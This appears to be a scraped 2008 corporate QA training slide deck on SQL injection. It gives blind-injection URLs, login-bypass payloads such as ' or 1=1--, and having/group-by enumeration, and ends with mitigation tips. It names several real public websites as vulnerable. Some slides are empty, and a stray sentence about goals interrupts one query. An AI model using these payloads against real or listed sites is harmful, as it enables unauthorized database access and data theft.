Professional Documents
Culture Documents
Core QA Team
5th March 2008
Agenda
2
©Copyright Kenexa® 2004
What is SQL Injection
3
©Copyright Kenexa® 2004
SQL Injection possibilities
4
©Copyright Kenexa® 2004
Technologies affected by SQL Injections
• JSPASPXML
• XSL JavascriptVB
• MFC and other ODBC-based tools
• APIs3- and 4GL-based languages such as C, OCI, Pro*C, and
COBOL Perl
• CGI scripts that access Oracle databases many more
5
©Copyright Kenexa® 2004
Types of SQL Injections
6
©Copyright Kenexa® 2004
Techniques in SQL Injections
• Authorization bypass
• Using the SELECT command
• Using the INSERT command
• Using SQL server stored procedures
7
©Copyright Kenexa® 2004
How to use Blind SQL injection
USER_NAME() is a SQL Server function that returns the name of the current
user. If the current user is dbo (administrator), the fifth press release will be
returned. If not, the query will fail and no press release will be displayed
Step4 - By combining sub queries and functions, we can ask more
complex questions. The following example attempts to retrieve the
name of a database table, one character at a time.
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5
AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects
WHERE xtype='U'), 1, 1))) > 109
Step5 - If the server returns the fifth press release in response to this
URL, we know that the first letter of the query’s result comes after
the letter “m” (ASCII character 109) in the alphabet. By making
multiple requests, we can determine the precise ASCII value.
9
©Copyright Kenexa® 2004
How to use Blind SQL injection
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND
ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE
xtype='U'), 1, 1))) > 116
10
©Copyright Kenexa® 2004
URL’s venerable to Blind SQL Injections
attack
http://www.bharatstudent.com/cafebharat/cafebharat.php?cat=2%20and%2
http://content-ind.cricinfo.com/wivzimsa/engine/current/match/298809.htm
http://www.minglebox.com/user.do?method=registerUser&error=true%20an
“
11
©Copyright Kenexa® 2004
How to use SQL injections
12
©Copyright Kenexa® 2004
How to use SQL injections
• Here is a sample basic HTML form with two inputs, login and
password.
<form method="post"
action="http://testasp.acunetix.com/login.asp">
<input name="tfUName" type="text" id="tfUName">
<input name="tfUPass" type="password" id="tfUPass">
</form>
SELECT id
FROM logins
WHERE username = 'Joe'
AND password = 'anything' OR 'x'='x' Make sure that your short term
goals will help to achieve the Medium term goals and vice versa.
14
©Copyright Kenexa® 2004
How to use SQL injections
• As the inputs of the web application are not properly sanitised, the
use of the single quotes has turned the WHERE SQL command into a
two-component clause.
• The 'x'='x' part guarantees to be true regardless of what the first
part contains.
• This will allow the attacker to bypass the login form without actually
knowing a valid username / password combination!
• Depending on the actual SQL query, you may have to try some of
these possibilities:
' or 1=1--
or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
15
©Copyright Kenexa® 2004
URL’s venerable to Blind SQL Injections
attack
http://www.osmania.ac.in/ou/res07/20080126.jsp
http://www.powerscrap.com/frame.aspx?Login=true
16
©Copyright Kenexa® 2004
How to use Advanced SQL injects
• The attacker could log in as the first user in the 'users' table, with
the following input:
Username: ' or 1=1--
• The attacker wants to establish the names of the tables that the
query operates on, and the names of the fields. To do this, the
attacker uses the 'having' clause of the 'select' statement:
Username: ' having 1=1–
• So the attacker now knows the table name and column name of the
first column in the query. They can continue through the columns by
introducing each field into a 'group by' clause, as follows:
Username: ' group by users.id having 1=1--
17
©Copyright Kenexa® 2004
How to use Advanced SQL injects
• (which produces the error…)
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'users.username' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.
/process_login.asp, line 35
19
©Copyright Kenexa® 2004
How to avoid SQL Injections
• Filter out character like single quote, double quote, slash, back
slash, semi colon, extended character like NULL, carry return, new
line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie
For numeric value, convert it to an integer before parsing it into SQL
statement. Or using ISNUMERIC to make sure it is an integer.
Change "Startup and run SQL Server" using low privilege user in
SQL Server Security tab.
Delete stored procedures that you are not using like:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
20
©Copyright Kenexa® 2004
Next generation of Hacking
• Ethical Hacking
• Server side scripting
• Client side scripting
• Bluetooth Hacking
• Console Hacking
21
©Copyright Kenexa® 2004
Tools for SQL Injection
22
©Copyright Kenexa® 2004
References
http://www.unixwiz.net/techtips/sql-injection.html
http://www.imperva.com/resources/glossary/sql_injection.html
http://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
http://www.security-hacks.com/2007/05/18/top-15-free-sql-injection-scanne
23
©Copyright Kenexa® 2004
24
©Copyright Kenexa® 2004
www.kenexa.com